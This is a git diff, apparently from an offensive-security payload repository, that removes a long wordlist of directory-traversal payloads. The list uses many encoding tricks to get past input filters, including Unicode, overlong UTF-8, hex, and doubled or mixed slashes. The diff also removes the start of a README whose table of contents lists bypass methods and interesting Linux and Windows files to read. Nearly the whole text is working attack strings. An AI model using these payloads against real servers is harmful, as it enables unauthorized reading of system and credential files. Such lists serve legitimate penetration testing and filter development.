-/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE} -/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE} -/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE} -/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE} -/%uff0e%uff0e%u2215{FILE} -/%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE} -/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE} -/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE} -/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE} -/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE} -/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE} -/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE} -/..%u2216{FILE} -/..%u2216..%u2216{FILE} -/..%u2216..%u2216..%u2216{FILE} -/..%u2216..%u2216..%u2216..%u2216{FILE} -/..%u2216..%u2216..%u2216..%u2216..%u2216{FILE} -/..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE} -/..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE} -/..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE} -/..%uEFC8{FILE} -/..%uEFC8..%uEFC8{FILE} -/..%uEFC8..%uEFC8..%uEFC8{FILE} -/..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE} -/..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE} -/..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE} -/..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE} -/..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE} -/..%uF025{FILE} -/..%uF025..%uF025{FILE} -/..%uF025..%uF025..%uF025{FILE} -/..%uF025..%uF025..%uF025..%uF025{FILE} -/..%uF025..%uF025..%uF025..%uF025..%uF025{FILE} -/..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE} -/..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE} -/..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE} -/%uff0e%uff0e\{FILE} -/%uff0e%uff0e\%uff0e%uff0e\{FILE} -/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE} -/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE} -/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE} -/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE} -/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE} -/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE} -/%uff0e%uff0e%u2216{FILE} -/%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE} -/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE} -/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE} -/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE} -/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE} -/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE} -/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE} -/..0x2f{FILE} -/..0x2f..0x2f{FILE} -/..0x2f..0x2f..0x2f{FILE} -/..0x2f..0x2f..0x2f..0x2f{FILE} -/..0x2f..0x2f..0x2f..0x2f..0x2f{FILE} -/..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE} -/..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE} -/..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE} -/0x2e0x2e/{FILE} -/0x2e0x2e/0x2e0x2e/{FILE} -/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE} -/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE} -/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE} -/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE} -/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE} -/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE} -/0x2e0x2e0x2f{FILE} -/0x2e0x2e0x2f0x2e0x2e0x2f{FILE} -/0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE} -/0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE} -/0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE} -/0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE} -/0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE} -/0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE} -/..0x5c{FILE} -/..0x5c..0x5c{FILE} -/..0x5c..0x5c..0x5c{FILE} -/..0x5c..0x5c..0x5c..0x5c{FILE} -/..0x5c..0x5c..0x5c..0x5c..0x5c{FILE} -/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE} -/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE} -/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE} -/0x2e0x2e\{FILE} -/0x2e0x2e\0x2e0x2e\{FILE} -/0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE} -/0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE} -/0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE} -/0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE} -/0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE} -/0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE} -/0x2e0x2e0x5c{FILE} -/0x2e0x2e0x5c0x2e0x2e0x5c{FILE} -/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE} -/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE} -/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE} -/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE} -/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE} -/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE} -/..%c0%2f{FILE} -/..%c0%2f..%c0%2f{FILE} -/..%c0%2f..%c0%2f..%c0%2f{FILE} -/..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE} -/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE} -/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE} -/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE} -/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE} -/%c0%2e%c0%2e/{FILE} -/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE} -/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE} -/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE} -/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE} -/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE} -/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE} -/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE} -/%c0%2e%c0%2e%c0%2f{FILE} -/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE} -/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE} -/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE} -/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE} -/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE} -/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE} -/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE} -/..%c0%5c{FILE} -/..%c0%5c..%c0%5c{FILE} -/..%c0%5c..%c0%5c..%c0%5c{FILE} -/..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE} -/..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE} -/..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE} -/..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE} -/..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE} -/%c0%2e%c0%2e\{FILE} -/%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE} -/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE} -/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE} -/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE} -/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE} -/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE} -/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE} -/%c0%2e%c0%2e%c0%5c{FILE} -/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE} -/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE} -/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE} -/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE} -/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE} -/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE} -/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE} -////%2e%2e%2f{FILE} -////%2e%2e%2f%2e%2e%2f{FILE} -////%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE} -/\\\%2e%2e%5c{FILE} -/\\\%2e%2e%5c%2e%2e%5c{FILE} -/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE} -/..//{FILE} -/..//..//{FILE} -/..//..//..//{FILE} -/..//..//..//..//{FILE} -/..//..//..//..//..//{FILE} -/..//..//..//..//..//..//{FILE} -/..//..//..//..//..//..//..//{FILE} -/..//..//..//..//..//..//..//..//{FILE} -/..///{FILE} -/..///..///{FILE} -/..///..///..///{FILE} -/..///..///..///..///{FILE} -/..///..///..///..///..///{FILE} -/..///..///..///..///..///..///{FILE} -/..///..///..///..///..///..///..///{FILE} -/..///..///..///..///..///..///..///..///{FILE} -/..\\{FILE} -/..\\..\\{FILE} -/..\\..\\..\\{FILE} -/..\\..\\..\\..\\{FILE} -/..\\..\\..\\..\\..\\{FILE} -/..\\..\\..\\..\\..\\..\\{FILE} -/..\\..\\..\\..\\..\\..\\..\\{FILE} -/..\\..\\..\\..\\..\\..\\..\\..\\{FILE} -/..\\\{FILE} -/..\\\..\\\{FILE} -/..\\\..\\\..\\\{FILE} -/..\\\..\\\..\\\..\\\{FILE} -/..\\\..\\\..\\\..\\\..\\\{FILE} -/..\\\..\\\..\\\..\\\..\\\..\\\{FILE} -/..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE} -/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE} -/./\/./{FILE} -/./\/././\/./{FILE} -/./\/././\/././\/./{FILE} -/./\/././\/././\/././\/./{FILE} -/./\/././\/././\/././\/././\/./{FILE} -/./\/././\/././\/././\/././\/././\/./{FILE} -/./\/././\/././\/././\/././\/././\/././\/./{FILE} -/./\/././\/././\/././\/././\/././\/././\/././\/./{FILE} -/.\/\.\{FILE} -/.\/\.\.\/\.\{FILE} -/.\/\.\.\/\.\.\/\.\{FILE} -/.\/\.\.\/\.\.\/\.\.\/\.\{FILE} -/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE} -/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE} -/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE} -/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE} -/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE} -/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE} -/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE} -/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE} -/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE} -/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE} -/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE} -/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE} -/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE} -/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE} -/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE} -/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE} -/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE} -/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE} -/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE} -/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE} -/./../{FILE} -/./.././../{FILE} -/./.././.././../{FILE} -/./.././.././.././../{FILE} -/./.././.././.././.././../{FILE} -/./.././.././.././.././.././../{FILE} -/./.././.././.././.././.././.././../{FILE} -/./.././.././.././.././.././.././.././../{FILE} -/.\..\{FILE} -/.\..\.\..\{FILE} -/.\..\.\..\.\..\{FILE} -/.\..\.\..\.\..\.\..\{FILE} -/.\..\.\..\.\..\.\..\.\..\{FILE} -/.\..\.\..\.\..\.\..\.\..\.\..\{FILE} -/.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE} -/.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE} -/.//..//{FILE} -/.//..//.//..//{FILE} -/.//..//.//..//.//..//{FILE} -/.//..//.//..//.//..//.//..//{FILE} -/.//..//.//..//.//..//.//..//.//..//{FILE} -/.//..//.//..//.//..//.//..//.//..//.//..//{FILE} -/.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE} -/.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE} -/.\\..\\{FILE} -/.\\..\\.\\..\\{FILE} -/.\\..\\.\\..\\.\\..\\{FILE} -/.\\..\\.\\..\\.\\..\\.\\..\\{FILE} -/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE} -/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE} -/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE} -/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE} -/../{FILE} -/../..//{FILE} -/../..//../{FILE} -/../..//../..//{FILE} -/../..//../..//../{FILE} -/../..//../..//../..//{FILE} -/../..//../..//../..//../{FILE} -/../..//../..//../..//../..//{FILE} -/..\{FILE} -/..\..\\{FILE} -/..\..\\..\{FILE} -/..\..\\..\..\\{FILE} -/..\..\\..\..\\..\{FILE} -/..\..\\..\..\\..\..\\{FILE} -/..\..\\..\..\\..\..\\..\{FILE} -/..\..\\..\..\\..\..\\..\..\\{FILE} -/..///{FILE} -/../..///{FILE} -/../..//..///{FILE} -/../..//../..///{FILE} -/../..//../..//..///{FILE} -/../..//../..//../..///{FILE} -/../..//../..//../..//..///{FILE} -/../..//../..//../..//../..///{FILE} -/..\\\{FILE} -/..\..\\\{FILE} -/..\..\\..\\\{FILE} -/..\..\\..\..\\\{FILE} -/..\..\\..\..\\..\\\{FILE} -/..\..\\..\..\\..\..\\\{FILE} -/..\..\\..\..\\..\..\\..\\\{FILE} -/..\..\\..\..\\..\..\\..\..\\\{FILE} -/\..%2f -/\..%2f\..%2f -/\..%2f\..%2f\..%2f -/\..%2f\..%2f\..%2f\..%2f -/\..%2f\..%2f\..%2f\..%2f\..%2f -/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f -/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f -/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE} diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md deleted file mode 100644 index 5fa1140..0000000 --- a/Directory Traversal/README.md +++ /dev/null @@ -1,212 +0,0 @@ -# Directory Traversal - -> A directory or path traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs. - -## Summary - -* [Tools](#tools) -* [Basic exploitation](#basic-exploitation) - * [16 bits Unicode encoding](#16-bits-unicode-encoding) - * [UTF-8 Unicode encoding](#utf-8-unicode-encoding) - * [Bypass "../" replaced by ""](#bypass--replaced-by-) - * [Bypass "../" with ";"](#bypass--with-) - * [Double URL encoding](#double-url-encoding) - * [UNC Bypass](#unc-bypass) - * [NGINX/ALB Bypass](#nginxalb-bypass) -* [Path Traversal](#path-traversal) - * [Interesting Linux files](#interesting-linux-files) - * [Interesting Windows files](#interesting-windows-files) -* [References](#references) - -## Tools - -- 